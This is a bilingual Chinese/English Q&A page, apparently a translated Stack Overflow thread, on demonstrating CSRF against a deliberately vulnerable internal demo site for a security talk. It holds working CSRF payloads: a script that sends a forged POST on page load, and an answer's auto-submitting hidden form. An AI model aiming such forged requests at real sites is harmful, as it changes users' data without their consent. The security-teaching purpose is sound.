如何演示 CSRF 攻击 [英] How to demonstrate a CSRF attack
问题描述
我正在向我们企业中的其他人介绍网络安全,我想展示一些示例以产生更大的影响.
I'm doing an introduction to the web security to some other people in our enterprise, and I want to show some example to have more impact.
为此,我创建了一个容易受到此攻击的小网站,该网站只能在我们的网络上访问.
For this I've created a small website which is vulnerable to this attack, this website will be accessible only on our network.
我现在正在尝试利用这种攻击,但我有一个问题:
I'm now trying to exploit this attack, but I've one question:
如何使用 POST 表单执行此操作?
How to do this with a POST form?
使用 GET 查询执行此操作没有问题,但是使用 POST 时,我正在尝试使用 javascript 执行此操作,如果我将代码托管在同一主机上没问题,但是如果我想托管我的代码到另一个主机更现实,我被阻止,因为它是一个跨域请求.
I've no problem doing this with a GET query, but with a POST, I'm trying to do this with javascript, no problem if I host my code on the same host, but if I want to host my code to another host to be more realistic, I get blocked because it's a cross-domain request.
那么我应该如何发送这些 POST 变量?
So how should I send these POST vars?
谢谢!
这是我当前的代码:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>CSRF attack demo</title>
<script type="text/javascript">
function getHTTPObject() {
var http = false;
//Use IE's ActiveX items to load the file.
if(typeof ActiveXObject != 'undefined') {
try {http = new ActiveXObject("Msxml2.XMLHTTP");}
catch (e) {
try {http = new ActiveXObject("Microsoft.XMLHTTP");}
catch (E) {http = false;}
}
//If ActiveX is not available, use the XMLHttpRequest of Firefox/Mozilla etc. to load the document.
} else if (window.XMLHttpRequest) {
try {http = new XMLHttpRequest();}
catch (e) {http = false;}
}
return http;
}
function post_to_url(path, params, method) {
method = method || "post"; // Set method to post by default, if not specified.
// The rest of this code assumes you are not using a library.
// It can be made less wordy if you use one.
var form = document.createElement("form");
form.setAttribute("method", method);
form.setAttribute("action", path);
for(var key in params) {
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", key);
hiddenField.setAttribute("value", params[key]);
form.appendChild(hiddenField);
}
document.body.appendChild(form);
form.submit();
}
function postToUrlBackground(path, params){
var http = getHTTPObject();
http.open("POST", path, true);
//Send the proper header information along with the request
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.setRequestHeader("Content-length", params.length);
http.setRequestHeader("Connection", "close");
http.onreadystatechange = function() {//Call a function when the state changes.
if(http.readyState == 4 && http.status == 200) {
//alert("Response received");
}
}
http.send(params);
}
function TryAttack(){
//alert("Sending");
postToUrlBackground("http://localhost:51612/Movie/Edit/1", "Title=%28500%29This+item+has+been+changed+without+any+rights&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE");
//postToUrlBackground("http://localhost:51612/Movie/Edit/1","Title=%28500%29+JOURS+ENSEMBLE&Year=2009&OriginalTitle=%28500%29+DAYS+OF+SUMMERS&Duration=5700&IDMC=500+JOURS+ENSEMBLE" );
//alert("sent");
}
</script>
</head>
<body onload="TryAttack()">
<img src=image.png />
</body>
</html>
推荐答案
在其他主机"(攻击者)上,您只需使用 方法创建一个
其 FORM
>POSTaction
(即提交表单的位置)是您的易受攻击的应用程序.然后你在那个页面上用 javascript 提交它.
On the "other host" (the attacker) you just create a FORM
with method POST
whose action
(i.e. where the form is submitted) is your vulnerable app. Then you submit it with javascript on that page.
像这样:
<html><body>
<form name="csrf_form" action="http://VULNERABLE_APP/csrf.php" method="POST">
<input type="hidden" name="csrf_param" value="POST_ATTACK">
</form>
<script type="text/javascript">document.csrf_form.submit();</script>
</body></html>
当您打开该页面时,这将从攻击者的主机向您的易受攻击的应用程序提交 POST
.
This will submit a POST
to your vulnerable app from the attacker's host, when you open that page.
这篇关于如何演示 CSRF 攻击的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!